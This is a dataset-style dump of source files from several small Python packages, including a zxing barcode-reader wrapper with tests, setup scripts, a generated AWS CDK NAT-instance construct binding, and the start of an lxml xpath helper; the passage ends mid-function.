code
stringlengths 1
5.19M
| package
stringlengths 1
81
| path
stringlengths 9
304
| filename
stringlengths 4
145
|
---|---|---|---|
__version__="0.19"
|
zxingmod
|
/zxingmod-0.19.tar.gz/zxingmod-0.19/zxing/version.py
|
version.py
|
########################################################################
#
# zxing.py -- a quick and dirty wrapper for zxing for python
#
# this allows you to send images and get back data from the ZXing
# library: http://code.google.com/p/zxing/
#
from __future__ import print_function
from urllib.parse import quote
from enum import Enum
import pathlib
import zipfile
from .version import __version__
import subprocess as sp, re, os
class BarCodeReaderException(Exception):
def __init__(self, message, filename=None, underlying=None):
self.message, self.filename, self.underlying = message, filename, underlying
super().__init__(message, filename, underlying)
class BarCodeReader(object):
cls = "com.google.zxing.client.j2se.CommandLineRunner"
def __init__(self, classpath=None, java=None):
self.java = java or 'java'
self.zxing_version = self.zxing_version_info = None
if classpath:
self.classpath = classpath if isinstance(classpath, str) else ':'.join(classpath)
elif "ZXING_CLASSPATH" in os.environ:
self.classpath = os.environ.get("ZXING_CLASSPATH","")
else:
self.classpath = os.path.join(os.path.dirname(__file__), 'java', '*')
with zipfile.ZipFile(os.path.join(os.path.dirname(__file__), 'java', 'core.jar')) as c:
for line in c.open('META-INF/MANIFEST.MF'):
if line.startswith(b'Bundle-Version: '):
self.zxing_version = line.split(b' ', 1)[1].strip().decode()
self.zxing_version_info = tuple(int(n) for n in self.zxing_version.split('.'))
break
def decode(self, filenames, try_harder=False, possible_formats=None, pure_barcode=False, products_only=False):
possible_formats = (possible_formats,) if isinstance(possible_formats, str) else possible_formats
if isinstance(filenames, str):
one_file = True
filenames = filenames,
else:
one_file = False
file_uris = [ pathlib.Path(f).absolute().as_uri() for f in filenames ]
cmd = [self.java, '-cp', self.classpath, self.cls] + file_uris
if try_harder:
cmd.append('--try_harder')
if pure_barcode:
cmd.append('--pure_barcode')
if products_only:
cmd.append('--products_only')
if possible_formats:
for pf in possible_formats:
cmd += ['--possible_formats', pf ]
try:
p = sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.STDOUT, universal_newlines=False)
except FileNotFoundError as e:
raise BarCodeReaderException("Java binary specified (%s) does not exist" % self.java, self.java, e)
except PermissionError as e:
raise BarCodeReaderException("Java binary specified (%s) is not executable" % self.java, self.java, e)
stdout, stderr = p.communicate()
if stdout.startswith((b'Error: Could not find or load main class com.google.zxing.client.j2se.CommandLineRunner',
b'Exception in thread "main" java.lang.NoClassDefFoundError:')):
raise BarCodeReaderException("Java JARs not found in classpath (%s)" % self.classpath, self.classpath)
elif stdout.startswith((b'''Exception in thread "main" javax.imageio.IIOException: Can't get input stream from URL!''',
b'''Exception in thread "main" java.util.concurrent.ExecutionException: javax.imageio.IIOException: Can't get input stream from URL!''')):
raise BarCodeReaderException("Could not find image path: %s" % filenames, filenames)
elif stdout.startswith(b'''Exception in thread "main" java.io.IOException: Could not load '''):
raise BarCodeReaderException("Java library could not read image; is it in a supported format?", filenames)
elif stdout.startswith(b'''Exception '''):
raise BarCodeReaderException("Unknown Java exception: %s" % stdout)
elif p.returncode:
raise BarCodeReaderException("Unexpected Java subprocess return code %d" % p.returncode, self.java)
if p.returncode:
codes = [ None for fn in filenames ]
else:
file_results = []
for line in stdout.splitlines(True):
if line.startswith((b'file:///',b'Exception')):
file_results.append(line)
else:
file_results[-1] += line
codes = [ BarCode.parse(result) for result in file_results ]
if one_file:
return codes[0]
else:
# zxing (insanely) randomly reorders the output blocks, so we have to put them back in the
# expected order, based on their URIs
d = {c.uri: c for c in codes if c is not None} # there can be None in codes
return [d[f] if f in d else None for f in file_uris]
class CLROutputBlock(Enum):
UNKNOWN = 0
RAW = 1
PARSED = 2
POINTS = 3
class BarCode(object):
@classmethod
def parse(cls, zxing_output):
block = CLROutputBlock.UNKNOWN
uri = format = type = None
raw = parsed = b''
points = []
for l in zxing_output.splitlines(True):
if block==CLROutputBlock.UNKNOWN:
if l.endswith(b': No barcode found\n'):
return None
m = re.match(rb"(\S+) \(format:\s*([^,]+),\s*type:\s*([^)]+)\)", l)
if m:
uri, format, type = m.group(1).decode(), m.group(2).decode(), m.group(3).decode()
elif l.startswith(b"Raw result:"):
block = CLROutputBlock.RAW
elif block==CLROutputBlock.RAW:
if l.startswith(b"Parsed result:"):
block = CLROutputBlock.PARSED
else:
raw += l
elif block==CLROutputBlock.PARSED:
if re.match(rb"Found\s+\d+\s+result\s+points?", l):
block = CLROutputBlock.POINTS
else:
parsed += l
elif block==CLROutputBlock.POINTS:
m = re.match(rb"\s*Point\s*\d+:\s*\(([\d.]+),([\d.]+)\)", l)
if m:
points.append((float(m.group(1)), float(m.group(2))))
raw = raw[:-1].decode()
parsed = parsed[:-1].decode()
return cls(uri, format, type, raw, parsed, points)
def __init__(self, uri, format, type, raw, parsed, points):
self.raw = raw
self.parsed = parsed
self.uri = uri
self.format = format
self.type = type
self.points = points
def __repr__(self):
return '{}(raw={!r}, parsed={!r}, uri={!r}, format={!r}, type={!r}, points={!r})'.format(
self.__class__.__name__, self.raw, self.parsed, self.uri, self.format, self.type, self.points)
|
zxingmod
|
/zxingmod-0.19.tar.gz/zxingmod-0.19/zxing/__init__.py
|
__init__.py
|
import logging
import zxing
from tempfile import mkdtemp
import os
from nose import with_setup
from nose.tools import raises
test_barcode_dir = os.path.join(os.path.dirname(__file__), 'barcodes')
test_barcodes = [
( 'QR_CODE-easy.png', 'QR_CODE', 'This should be QR_CODE', ),
( 'CODE_128-easy.jpg', 'CODE_128', 'This should be CODE_128', ),
( 'PDF_417-easy.bmp', 'PDF_417', 'This should be PDF_417', ),
( 'AZTEC-easy.jpg', 'AZTEC', 'This should be AZTEC' ),
( 'QR CODE (¡filenáme törture test! 😉).png', 'QR_CODE', 'This should be QR_CODE' ),
( 'QR_CODE-png-but-wrong-extension.bmp', 'QR_CODE', 'This should be QR_CODE' ),
( 'QR_CODE-fun-with-whitespace.png', 'QR_CODE', '\n\r\t\r\r\r\n ' ),
( 'QR_CODE-screen_scraping_torture_test.png', 'QR_CODE',
'\n\\n¡Atención ☹! UTF-8 characters,\n\r embedded newlines,\r &&am&p;& trailing whitespace\t \r ' ),
]
test_reader = None
def setup_reader():
global test_reader
if test_reader is None:
test_reader = zxing.BarCodeReader()
@with_setup(setup_reader)
def test_version():
global test_reader
assert test_reader.zxing_version is not None
assert '.'.join(map(str, test_reader.zxing_version_info)) == test_reader.zxing_version
@with_setup(setup_reader)
def _check_decoding(filename, expected_format, expected_raw, extra={}):
global test_reader
path = os.path.join(test_barcode_dir, filename)
logging.debug('Trying to parse {}, expecting {!r}.'.format(path, expected_raw))
dec = test_reader.decode(path, pure_barcode=True, **extra)
if expected_raw is None:
if dec is not None:
raise AssertionError('Expected failure, but got result in {} format'.format(expected_format, dec.format))
else:
if dec.raw != expected_raw:
raise AssertionError('Expected {!r} but got {!r}'.format(expected_raw, dec.raw))
if dec.format != expected_format:
raise AssertionError('Expected {!r} but got {!r}'.format(expected_format, dec.format))
def test_decoding():
global test_reader
yield from ((_check_decoding, filename, expected_format, expected_raw) for filename, expected_format, expected_raw in test_barcodes)
def test_possible_formats():
yield from ((_check_decoding, filename, expected_format, expected_raw, dict(possible_formats=('CODE_93', expected_format, 'DATA_MATRIX')))
for filename, expected_format, expected_raw in test_barcodes)
@with_setup(setup_reader)
def test_decoding_multiple():
reader = zxing.BarCodeReader()
filenames = [os.path.join(test_barcode_dir, filename) for filename, expected_format, expected_raw in test_barcodes]
for dec, (filename, expected_format, expected_raw) in zip(reader.decode(filenames, pure_barcode=True), test_barcodes):
if dec.raw != expected_raw:
raise AssertionError('{}: Expected {!r} but got {!r}'.format(filename, expected_raw, dec.parsed))
if dec.format != expected_format:
raise AssertionError('{}: Expected {!r} but got {!r}'.format(filename, expected_format, dec.format))
def test_parsing():
dec = zxing.BarCode.parse("""
file:///tmp/default.png (format: FAKE_DATA, type: TEXT):
Raw result:
Élan|\tthe barcode is taking off
Parsed result:
Élan
\tthe barcode is taking off
Found 4 result points:
Point 0: (24.0,18.0)
Point 1: (21.0,196.0)
Point 2: (201.0,198.0)
Point 3: (205.23952,21.0)
""".encode())
assert dec.uri == 'file:///tmp/default.png'
assert dec.format == 'FAKE_DATA'
assert dec.type == 'TEXT'
assert dec.raw == 'Élan|\tthe barcode is taking off'
assert dec.parsed == 'Élan\n\tthe barcode is taking off'
assert dec.points == [(24.0,18.0),(21.0,196.0),(201.0,198.0),(205.23952,21.0)]
def test_wrong_formats():
all_test_formats = {fmt for fn,fmt,raw in test_barcodes}
yield from ((_check_decoding, filename, expected_format, None, dict(possible_formats=all_test_formats - {expected_format}))
for filename, expected_format, expected_raw in test_barcodes)
@raises(zxing.BarCodeReaderException)
def test_bad_java():
test_reader = zxing.BarCodeReader(java=os.devnull)
test_reader.decode(test_barcodes[0][0])
@raises(zxing.BarCodeReaderException)
def test_bad_classpath():
test_reader = zxing.BarCodeReader(classpath=mkdtemp())
test_reader.decode(test_barcodes[0][0])
@raises(zxing.BarCodeReaderException)
@with_setup(setup_reader)
def test_nonexistent_file_error():
global test_reader
test_reader.decode(os.path.join(test_barcode_dir, 'nonexistent.png'))
@raises(zxing.BarCodeReaderException)
@with_setup(setup_reader)
def test_bad_file_format_error():
global test_reader
test_reader.decode(os.path.join(test_barcode_dir, 'bad_format.png'))
|
zxingmod
|
/zxingmod-0.19.tar.gz/zxingmod-0.19/test/test_all.py
|
test_all.py
|
===========
zxinvoice
===========
|
zxinvoice
|
/zxinvoice-1.0.2.tar.gz/zxinvoice-1.0.2/README.rst
|
README.rst
|
from setuptools import *
# from distutils.core import setup
def readme():
with open('README.md', encoding='utf-8') as f:
content = f.read()
return content
setup(
name='zxinvoice', # 包名称
version='1.0.2', # 版本
author='Jason', # 作者
author_email='jason@rimeix.com', # 作者邮箱
description='This is for managing invoice', # 描述
long_description=readme(), # 长文描述
long_description_content_type='text/markdown', # 长文描述的文本格式
keywords='zxinvoice', # 关键词
# url='', # 项目主页
classifiers=[],
# license='Apache License 2.0', # 许可证
packages=find_packages('src'),
install_requires=[
'chinesecalendar',
'baidu-aip',
'chardet',
'pywebio',
'pysqlcipher3',
],
python_requires='>=3.6',
# entry_points={
# 'console_scripts': [
# 'zxinvoice = zxinvoice.main:main' # 格式为'命令名 = 模块名:函数名'
# ]
# }
)
|
zxinvoice
|
/zxinvoice-1.0.2.tar.gz/zxinvoice-1.0.2/setup.py
|
setup.py
|
'''
# Simple NAT

[](https://www.npmjs.com/package/cdk-construct-simple-nat)
[](https://pypi.org/project/zxkane.cdk-construct-simple-nat/)

It's a CDK construct to create NAT instances on AWS.
It supports adding specific IP CIDRs to route tables of VPC, the network traffic to those IP CIDRs will be forwarded to the NAT instances.
It supports routing to below services out of box,
* Github git servers
* Google
* Cloudflare

## Install
TypeScript/JavaScript:
```shell
yarn add cdk-construct-simple-nat
```
or
```shell
npm install cdk-construct-simple-nat
```
## Usage
```python
import { SimpleNAT } from 'cdk-construct-simple-nat';
new SimpleNAT(this, 'SimpleNAT', {
vpc,
natSubnetsSelection: {
subnetType: SubnetType.PUBLIC,
onePerAz: true,
},
})
.withGithubRoute();
```
See the complete [example](example/) and [API doc](./API.md).
## FAQ
### What's the difference between [EC2 NAT instances](https://docs.aws.amazon.com/cdk/api/latest/docs/aws-ec2-readme.html#using-nat-instances) and NAT instances created by this construct
There are below differences,
* EC2 NAT instance will route all Internet traffic to itself by default
* NAT instance uses depracated Amazon Linux AMI, this construct always uses latest Amazon Linux 2 AMI
* NAT instances created by this construct can work with NAT gateways together, you can have multiple NAT instances in one VPC
* This construct can help when only routing specific traffic(for example, github/gist) to NAT instances which acts as transit proxy
### What's the difference between [CDK built-in NAT instances](https://docs.aws.amazon.com/cdk/api/latest/docs/aws-ec2-readme.html#using-nat-instances) and NAT instances created by this construct
* CDK built-in NAT instances has to be created with VPC stack, this construct can add NAT instances to any existing VPC
* You can use this construct multiple NAT instances for different purposes
* This construct allows you customize the instances how to route the traffic
### The deployment fails due to the routes in route table exceeds the limit
[The default routes in route table is 50](https://docs.aws.amazon.com/vpc/latest/userguide/amazon-vpc-limits.html#vpc-limits-route-tables), the deployment will fail if adding routes more than the limit of your account.
You can increase the limit up to **1000** routes per route table via service quota.
### How to exclude IPv6 CIDR with built-in github/google/cloudflare routes
You can exclude IPv6 CIDR like below,
```python
new SimpleNAT(this, 'SimpleNAT', {
vpc,
})
.withCloudflareRoute({
excludeIPv6: true,
});
```
'''
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from typeguard import check_type
from ._jsii import *
import aws_cdk as _aws_cdk_ceddda9d
import aws_cdk.aws_ec2 as _aws_cdk_aws_ec2_ceddda9d
import aws_cdk.aws_iam as _aws_cdk_aws_iam_ceddda9d
import constructs as _constructs_77d1e7e8
@jsii.data_type(
jsii_type="cdk-construct-simple-nat.RouteProps",
jsii_struct_bases=[],
name_mapping={"exclude_i_pv6": "excludeIPv6"},
)
class RouteProps:
def __init__(self, *, exclude_i_pv6: typing.Optional[builtins.bool] = None) -> None:
'''Properties for how adding IPs to route.
:param exclude_i_pv6: If excluding IPv6 when creating route. Default: - false
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__4d34548d22997ef5a79c5e9d6f568bc469b4cd6258c1f2ceb04fc1b6982a08d8)
check_type(argname="argument exclude_i_pv6", value=exclude_i_pv6, expected_type=type_hints["exclude_i_pv6"])
self._values: typing.Dict[builtins.str, typing.Any] = {}
if exclude_i_pv6 is not None:
self._values["exclude_i_pv6"] = exclude_i_pv6
@builtins.property
def exclude_i_pv6(self) -> typing.Optional[builtins.bool]:
'''If excluding IPv6 when creating route.
:default: - false
'''
result = self._values.get("exclude_i_pv6")
return typing.cast(typing.Optional[builtins.bool], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RouteProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class SimpleNAT(
_aws_cdk_ceddda9d.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="cdk-construct-simple-nat.SimpleNAT",
):
'''Simple NAT instaces construct.'''
def __init__(
self,
scope: _constructs_77d1e7e8.Construct,
id: builtins.str,
*,
vpc: _aws_cdk_aws_ec2_ceddda9d.IVpc,
custom_scripts: typing.Optional[builtins.str] = None,
instance_type: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.InstanceType] = None,
key_name: typing.Optional[builtins.str] = None,
machine_image: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.IMachineImage] = None,
nat_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
private_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
role: typing.Optional[_aws_cdk_aws_iam_ceddda9d.IRole] = None,
) -> None:
'''
:param scope: -
:param id: -
:param vpc: The VPC the NAT instances will reside.
:param custom_scripts: The custom script when provisioning the NAT instances. Default: - no custom script.
:param instance_type: The instance type of NAT instances. Default: - t3.MICRO.
:param key_name: The key name of ssh key of NAT instances. Default: - No SSH access will be possible.
:param machine_image: The AMI of NAT instances. Default: - Amazon Linux 2 for x86_64.
:param nat_subnets_selection: The subnet selection for NAT instances, one NAT instance will be placed in the selected subnets. NOTE: must select the public subnet Default: - subnetType is SubnetType.PUBLIC and onePerAZ is true.
:param private_subnets_selection: The subnet selection for updating route tables for selected subnets. Default: - subnetType is SubnetType.PRIVATE_WITH_NAT.
:param role: The IAM role attached to NAT instances. Default: - an IAM role is created.
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__197af24f4f5730f96fa183c445a232b5186626045f427ebb5867ad1d8c7e09da)
check_type(argname="argument scope", value=scope, expected_type=type_hints["scope"])
check_type(argname="argument id", value=id, expected_type=type_hints["id"])
props = SimpleNATProps(
vpc=vpc,
custom_scripts=custom_scripts,
instance_type=instance_type,
key_name=key_name,
machine_image=machine_image,
nat_subnets_selection=nat_subnets_selection,
private_subnets_selection=private_subnets_selection,
role=role,
)
jsii.create(self.__class__, self, [scope, id, props])
@jsii.member(jsii_name="addV4Route")
def add_v4_route(self, v4_cidr: builtins.str) -> "SimpleNAT":
'''
:param v4_cidr: -
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__c1c06f12fb3f5aa03c07a8dcbe1253103ac4995ab0bfa1a628dabf2fd78d682e)
check_type(argname="argument v4_cidr", value=v4_cidr, expected_type=type_hints["v4_cidr"])
return typing.cast("SimpleNAT", jsii.invoke(self, "addV4Route", [v4_cidr]))
@jsii.member(jsii_name="addV6Route")
def add_v6_route(self, v6_cidr: builtins.str) -> "SimpleNAT":
'''
:param v6_cidr: -
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__93261506b573bb0ec3744c03025737a256877686f97d9d1c0ce75e2181794949)
check_type(argname="argument v6_cidr", value=v6_cidr, expected_type=type_hints["v6_cidr"])
return typing.cast("SimpleNAT", jsii.invoke(self, "addV6Route", [v6_cidr]))
@jsii.member(jsii_name="withCloudflareRoute")
def with_cloudflare_route(
self,
*,
exclude_i_pv6: typing.Optional[builtins.bool] = None,
) -> "SimpleNAT":
'''Add Cloudflare IPs to route table.
See https://www.cloudflare.com/ips/ for details
:param exclude_i_pv6: If excluding IPv6 when creating route. Default: - false
'''
props = RouteProps(exclude_i_pv6=exclude_i_pv6)
return typing.cast("SimpleNAT", jsii.invoke(self, "withCloudflareRoute", [props]))
@jsii.member(jsii_name="withGithubRoute")
def with_github_route(
self,
*,
exclude_i_pv6: typing.Optional[builtins.bool] = None,
) -> "SimpleNAT":
'''Add Github IPs to route table.
:param exclude_i_pv6: If excluding IPv6 when creating route. Default: - false
'''
props = RouteProps(exclude_i_pv6=exclude_i_pv6)
return typing.cast("SimpleNAT", jsii.invoke(self, "withGithubRoute", [props]))
@jsii.member(jsii_name="withGoogleRoute")
def with_google_route(
self,
*,
exclude_i_pv6: typing.Optional[builtins.bool] = None,
) -> "SimpleNAT":
'''Add Google IPs to route table.
:param exclude_i_pv6: If excluding IPv6 when creating route. Default: - false
'''
props = RouteProps(exclude_i_pv6=exclude_i_pv6)
return typing.cast("SimpleNAT", jsii.invoke(self, "withGoogleRoute", [props]))
@jsii.python.classproperty
@jsii.member(jsii_name="Ipv6Regex")
def IPV6_REGEX(cls) -> builtins.str:
return typing.cast(builtins.str, jsii.sget(cls, "Ipv6Regex"))
@jsii.data_type(
jsii_type="cdk-construct-simple-nat.SimpleNATProps",
jsii_struct_bases=[],
name_mapping={
"vpc": "vpc",
"custom_scripts": "customScripts",
"instance_type": "instanceType",
"key_name": "keyName",
"machine_image": "machineImage",
"nat_subnets_selection": "natSubnetsSelection",
"private_subnets_selection": "privateSubnetsSelection",
"role": "role",
},
)
class SimpleNATProps:
def __init__(
self,
*,
vpc: _aws_cdk_aws_ec2_ceddda9d.IVpc,
custom_scripts: typing.Optional[builtins.str] = None,
instance_type: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.InstanceType] = None,
key_name: typing.Optional[builtins.str] = None,
machine_image: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.IMachineImage] = None,
nat_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
private_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
role: typing.Optional[_aws_cdk_aws_iam_ceddda9d.IRole] = None,
) -> None:
'''Properties for NAT instances.
:param vpc: The VPC the NAT instances will reside.
:param custom_scripts: The custom script when provisioning the NAT instances. Default: - no custom script.
:param instance_type: The instance type of NAT instances. Default: - t3.MICRO.
:param key_name: The key name of ssh key of NAT instances. Default: - No SSH access will be possible.
:param machine_image: The AMI of NAT instances. Default: - Amazon Linux 2 for x86_64.
:param nat_subnets_selection: The subnet selection for NAT instances, one NAT instance will be placed in the selected subnets. NOTE: must select the public subnet Default: - subnetType is SubnetType.PUBLIC and onePerAZ is true.
:param private_subnets_selection: The subnet selection for updating route tables for selected subnets. Default: - subnetType is SubnetType.PRIVATE_WITH_NAT.
:param role: The IAM role attached to NAT instances. Default: - an IAM role is created.
'''
if isinstance(nat_subnets_selection, dict):
nat_subnets_selection = _aws_cdk_aws_ec2_ceddda9d.SubnetSelection(**nat_subnets_selection)
if isinstance(private_subnets_selection, dict):
private_subnets_selection = _aws_cdk_aws_ec2_ceddda9d.SubnetSelection(**private_subnets_selection)
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__cb36a69875376bdd591a68534a6ce401cf1725004ca106be48dca435ff5b574c)
check_type(argname="argument vpc", value=vpc, expected_type=type_hints["vpc"])
check_type(argname="argument custom_scripts", value=custom_scripts, expected_type=type_hints["custom_scripts"])
check_type(argname="argument instance_type", value=instance_type, expected_type=type_hints["instance_type"])
check_type(argname="argument key_name", value=key_name, expected_type=type_hints["key_name"])
check_type(argname="argument machine_image", value=machine_image, expected_type=type_hints["machine_image"])
check_type(argname="argument nat_subnets_selection", value=nat_subnets_selection, expected_type=type_hints["nat_subnets_selection"])
check_type(argname="argument private_subnets_selection", value=private_subnets_selection, expected_type=type_hints["private_subnets_selection"])
check_type(argname="argument role", value=role, expected_type=type_hints["role"])
self._values: typing.Dict[builtins.str, typing.Any] = {
"vpc": vpc,
}
if custom_scripts is not None:
self._values["custom_scripts"] = custom_scripts
if instance_type is not None:
self._values["instance_type"] = instance_type
if key_name is not None:
self._values["key_name"] = key_name
if machine_image is not None:
self._values["machine_image"] = machine_image
if nat_subnets_selection is not None:
self._values["nat_subnets_selection"] = nat_subnets_selection
if private_subnets_selection is not None:
self._values["private_subnets_selection"] = private_subnets_selection
if role is not None:
self._values["role"] = role
@builtins.property
def vpc(self) -> _aws_cdk_aws_ec2_ceddda9d.IVpc:
'''The VPC the NAT instances will reside.'''
result = self._values.get("vpc")
assert result is not None, "Required property 'vpc' is missing"
return typing.cast(_aws_cdk_aws_ec2_ceddda9d.IVpc, result)
@builtins.property
def custom_scripts(self) -> typing.Optional[builtins.str]:
'''The custom script when provisioning the NAT instances.
:default: - no custom script.
'''
result = self._values.get("custom_scripts")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def instance_type(self) -> typing.Optional[_aws_cdk_aws_ec2_ceddda9d.InstanceType]:
'''The instance type of NAT instances.
:default: - t3.MICRO.
'''
result = self._values.get("instance_type")
return typing.cast(typing.Optional[_aws_cdk_aws_ec2_ceddda9d.InstanceType], result)
@builtins.property
def key_name(self) -> typing.Optional[builtins.str]:
'''The key name of ssh key of NAT instances.
:default: - No SSH access will be possible.
'''
result = self._values.get("key_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def machine_image(self) -> typing.Optional[_aws_cdk_aws_ec2_ceddda9d.IMachineImage]:
'''The AMI of NAT instances.
:default: - Amazon Linux 2 for x86_64.
'''
result = self._values.get("machine_image")
return typing.cast(typing.Optional[_aws_cdk_aws_ec2_ceddda9d.IMachineImage], result)
@builtins.property
def nat_subnets_selection(
self,
) -> typing.Optional[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection]:
'''The subnet selection for NAT instances, one NAT instance will be placed in the selected subnets.
NOTE: must select the public subnet
:default: - subnetType is SubnetType.PUBLIC and onePerAZ is true.
'''
result = self._values.get("nat_subnets_selection")
return typing.cast(typing.Optional[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection], result)
@builtins.property
def private_subnets_selection(
self,
) -> typing.Optional[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection]:
'''The subnet selection for updating route tables for selected subnets.
:default: - subnetType is SubnetType.PRIVATE_WITH_NAT.
'''
result = self._values.get("private_subnets_selection")
return typing.cast(typing.Optional[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection], result)
@builtins.property
def role(self) -> typing.Optional[_aws_cdk_aws_iam_ceddda9d.IRole]:
'''The IAM role attached to NAT instances.
:default: - an IAM role is created.
'''
result = self._values.get("role")
return typing.cast(typing.Optional[_aws_cdk_aws_iam_ceddda9d.IRole], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "SimpleNATProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
__all__ = [
"RouteProps",
"SimpleNAT",
"SimpleNATProps",
]
publication.publish()
def _typecheckingstub__4d34548d22997ef5a79c5e9d6f568bc469b4cd6258c1f2ceb04fc1b6982a08d8(
*,
exclude_i_pv6: typing.Optional[builtins.bool] = None,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__197af24f4f5730f96fa183c445a232b5186626045f427ebb5867ad1d8c7e09da(
scope: _constructs_77d1e7e8.Construct,
id: builtins.str,
*,
vpc: _aws_cdk_aws_ec2_ceddda9d.IVpc,
custom_scripts: typing.Optional[builtins.str] = None,
instance_type: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.InstanceType] = None,
key_name: typing.Optional[builtins.str] = None,
machine_image: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.IMachineImage] = None,
nat_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
private_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
role: typing.Optional[_aws_cdk_aws_iam_ceddda9d.IRole] = None,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__c1c06f12fb3f5aa03c07a8dcbe1253103ac4995ab0bfa1a628dabf2fd78d682e(
v4_cidr: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__93261506b573bb0ec3744c03025737a256877686f97d9d1c0ce75e2181794949(
v6_cidr: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__cb36a69875376bdd591a68534a6ce401cf1725004ca106be48dca435ff5b574c(
*,
vpc: _aws_cdk_aws_ec2_ceddda9d.IVpc,
custom_scripts: typing.Optional[builtins.str] = None,
instance_type: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.InstanceType] = None,
key_name: typing.Optional[builtins.str] = None,
machine_image: typing.Optional[_aws_cdk_aws_ec2_ceddda9d.IMachineImage] = None,
nat_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
private_subnets_selection: typing.Optional[typing.Union[_aws_cdk_aws_ec2_ceddda9d.SubnetSelection, typing.Dict[builtins.str, typing.Any]]] = None,
role: typing.Optional[_aws_cdk_aws_iam_ceddda9d.IRole] = None,
) -> None:
"""Type checking stubs"""
pass
|
zxkane.cdk-construct-simple-nat
|
/zxkane.cdk_construct_simple_nat-0.2.387-py3-none-any.whl/zxkane/cdk_construct_simple_nat/__init__.py
|
__init__.py
|
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from typeguard import check_type
import aws_cdk._jsii
import constructs._jsii
__jsii_assembly__ = jsii.JSIIAssembly.load(
"cdk-construct-simple-nat",
"0.2.387",
__name__[0:-6],
"cdk-construct-simple-nat@0.2.387.jsii.tgz",
)
__all__ = [
"__jsii_assembly__",
]
publication.publish()
|
zxkane.cdk-construct-simple-nat
|
/zxkane.cdk_construct_simple_nat-0.2.387-py3-none-any.whl/zxkane/cdk_construct_simple_nat/_jsii/__init__.py
|
__init__.py
|
def love():
print('xm')
|
zxl
|
/zxl-1.0.tar.gz/zxl-1.0/zxl.py
|
zxl.py
|
from setuptools import setup
setup(
name='zxl',
version='v1.0',
description='for love',
py_modules=['zxl'],
author='upuuuuuu',
author_email='2226548059@qq.com',
url='https://github.com/upuuuuuu',
license='MIT'
)
|
zxl
|
/zxl-1.0.tar.gz/zxl-1.0/setup.py
|
setup.py
|
import sys
def execute():
argv = sys.argv
print('cc :::: [ {} ]'.format(' '.join(argv)))
|
zxmtools
|
/zxmtools-0.0.0-py3-none-any.whl/cc/xx.py
|
xx.py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: zxpath.py
Author : Zhang Fan
date: 18/10/12
Description :
-------------------------------------------------
"""
__author__ = 'Zhang Fan'
from lxml import etree
class _base_library:
@staticmethod
def get_once(result, default=None):
if result:
return result[0]
return default
# region xpath原始查询代码
@staticmethod
def xpath_once(node, code, default=None):
return _base_library.get_once(node.xpath('{}[1]'.format(code)), default=default)
@staticmethod
def xpath_all(node, code):
return node.xpath(code)
# endregion
# region 比较判断
@staticmethod
def is_element(obj):
return isinstance(obj, etree._Element) or \
isinstance(obj, etree._ElementUnicodeResult) or \
isinstance(obj, etree._Comment)
@staticmethod
def is_node_element(obj):
# 判断对象是否为元素节点
return isinstance(obj, etree._Element)
@staticmethod
def is_text_element(obj):
# 判断对象是否为文本节点
return isinstance(obj, etree._ElementUnicodeResult)
@staticmethod
def is_comment(obj):
return isinstance(obj, etree._Comment)
# endregion
# region 转换获取
@staticmethod
def to_etree(text):
return etree.HTML(text)
@staticmethod
def to_string(node, default=None, del_none=True):
if isinstance(node, list):
result = []
for s in node:
s = _base_library.to_string(s, default)
if s or not del_none:
result.append(s)
return result
else:
return node.xpath('string(.)')
@staticmethod
def get_text(node, default=None, del_none=True):
if isinstance(node, list):
result = []
for s in node:
s = _base_library.get_text(s, default)
if s or not del_none:
result.append(s)
return result
else:
